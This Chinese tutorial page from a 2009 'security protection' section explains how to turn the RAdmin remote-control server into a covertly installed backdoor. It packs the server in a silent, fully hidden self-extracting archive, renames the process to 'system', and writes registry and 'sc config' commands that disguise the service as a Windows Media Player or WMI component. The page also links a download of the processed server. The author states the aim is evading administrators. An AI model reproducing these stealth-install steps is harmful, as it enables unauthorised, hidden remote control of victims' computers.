当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > RAdmin 服务端高级配置(2)

安全防护
如何清除隐藏的病毒文件
如何从进程中判断出病毒和木马
恶意邮件蠕虫假冒安全更新引诱用户上当
驱除毒源双击无法打开驱动器的杀毒方法
SHOPEX最新漏洞利用及解决方案
关于arp欺骗原理及防范
如何处理杀不掉的病毒
杜绝ASP网站漏洞入侵的八大法则
认识木马及木马防范
短路引起的双通道内存错误
电脑故障速排方法-内存篇
在IIS中打开“写入”权限,将轻易被黑客入侵
让硬盘摆脱五大怪异的骚扰
如何解决文件夹不能删除的情况
CPU占用100%原因及解决方法
熊猫烧香、威金的解决办法
病毒预警:使用MSN不慎可能被“幽灵”控制
ASP网站漏洞解析及黑客入侵防范方法
处理恶意软件的六个步骤
Vista首爆重大漏洞 网站被黑客植木马

安全防护 中的 RAdmin 服务端高级配置(2)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 26 ::
收藏到网摘: n/a

4.配置RAR高级自解压缩选项嘀时候。。注意那个解压路径 写成%systemroot%

\system32\drivers这个
步骤1 选择『在当前文件夹中创建』
步骤2 在『解压后运行』输入2.bat
步骤3 在『解压前运行』输入1.bat
步骤4 选择RAR高级自解压缩中的『模式』 改两个地方 选择『全部隐藏』和『

覆盖所有文件』

5.把你的r_server改名成system

6.RAR打包的时候不要忘记了SC这个程序

在上面我使用到了几个隐藏技巧。。

1.使用了attrib命令

2.利用注册表中的服务说明。。就是下面这一段
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >>

c:\ip.reg
echo "Description"="为Windows Media Player提供加载进程及为其他的移动

媒体,驱动程序和库提供基层安全协议服务。">> c:\ip.reg

@regedit /s c:\ip.reg
@del c:\ip.reg /f /q

大家应该可以看懂

3.使用SC改变了r_server服务名

@sc config r_server displayname= "Windows Management Instrumentation

Player Drivers"

有了以上的几步。。很多管理员都不会查出来。。当然普通人更不会了

大家选择一个好的端口就行了。。。如果要替换服务。。自己加几个命令在

2.bat中就是了。。

优点:
1.在 系统服务 中看见的是Windows Management Instrumentation Player

Drivers 服务 (可以自定义)
2.服务说明是 提供加载进程及为其他的移动媒体,驱动程序和库提供基层安全

协议服务
3.在cmd下面 使用net start 看见的自起动服务是Windows Management

Instrumentation Player Drivers
4.在进程中看见的是system(可以自定义,在2.bat文件中相应的地方改一下,

注意不要和已有的系统进程起冲突)

以上的程序。。SC,还有经过处理的RAdmin的服务端

下载地址:http://superhan.ys168.com

有下载。。。

这个就是我使用的。。有好的给我提提意见(替换服务出外)